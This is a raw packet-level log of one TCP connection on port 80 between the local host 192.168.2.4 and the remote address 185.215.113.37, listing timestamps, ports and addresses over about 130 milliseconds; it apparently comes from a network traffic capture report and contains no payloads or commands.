Sep 30, 2024 07:08:01.843441963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843451977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843461990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843471050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843481064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843492031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843499899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843502998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843533039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843559980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843564034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843579054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843590021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843600035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843610048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843610048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843621969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843622923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843641996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843663931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843725920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843738079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843746901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843758106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843767881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843786955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843800068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843800068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.843813896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843825102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.843867064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844115973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844125986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844136000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844170094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844185114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844202995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844214916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844224930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844240904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844252110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844260931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844289064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844319105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844336987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844347954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844360113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844372034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844392061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844400883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844403982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844425917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844434977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844436884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844451904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844461918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844466925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844501019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844528913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844541073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844552994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844564915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844578981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844589949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844599009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844610929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844618082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844655991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844667912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844679117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844691038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844703913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844722986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844732046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844743967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844760895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844772100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844784975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844810963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844824076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844836950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844875097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844906092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844918013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844928026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844961882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844976902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.844986916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.844999075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845010996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845024109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845037937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845062971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845063925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845079899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845093966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845110893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845138073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845174074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845185995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845204115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845216036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845225096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845246077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845268965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845300913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845312119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845323086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845334053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845345020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845355988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845372915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845385075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845386982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845416069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845422983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845434904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845441103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845447063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845474958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845499039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.845504045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845515966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.845551968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.885910988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.885922909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.885934114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.885971069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.885999918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886038065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886049986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886059999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886074066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886075974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886087894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886089087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886101961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886107922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886113882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886123896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886125088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886140108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886142015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886152983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886161089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886164904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886176109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886183977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886197090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886208057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886212111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886219025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886230946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886246920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886260986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886267900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886280060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886291027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886301994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886303902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886318922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886318922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886343956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886359930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886392117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886403084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886411905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886452913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886452913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886452913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886465073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886476040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886486053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886493921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886517048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.886539936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.886576891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.887490034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887545109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887546062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.887558937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887583971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.887599945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.887609959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887619972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887629986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887640953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.887653112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.887675047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930020094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930047035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930058002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930068970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930105925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930179119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930190086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930201054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930211067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930222034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930233955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930273056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930273056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930273056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930285931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930296898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930306911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930316925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930325031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930325031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930325031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930330992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930342913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930342913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930356026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930366039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930372953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930402040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930413961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930425882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930428982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930440903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930460930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930469036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930469036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930481911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930490017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930510044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930529118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930800915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930818081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930828094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930838108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930850029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930857897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930872917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930888891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930898905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930901051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930910110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930922031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930932045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930951118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930969000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.930973053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.930984020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931015968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931022882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931040049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931051016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931061029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931071043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931082010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931091070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931107998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931133032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931149960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931194067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931194067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931206942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931246996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931253910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931262016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931266069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931277990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931288004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931296110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931317091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931324959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931354046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931366920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931375980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931404114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931420088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931473970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931485891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931494951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931505919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931516886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931528091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931533098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931540012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931540012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931566954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931577921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931596041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931612015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931622028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931632996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931639910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931663036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931664944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931674957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931689978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931713104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931754112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931763887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931773901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931785107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931797981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931823969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931839943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931852102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931864023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931875944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931904078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931906939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931917906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931921005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931932926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.931951046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.931974888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932003975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932018042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932029009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932059050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932068110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932087898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932099104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932109118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932120085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932132006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932132959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932159901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932169914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932178974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.932183027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.932214975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972579956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972601891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972613096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972624063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972656012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972680092 CEST	49730	80	192.168.2.4	185.215.113.37
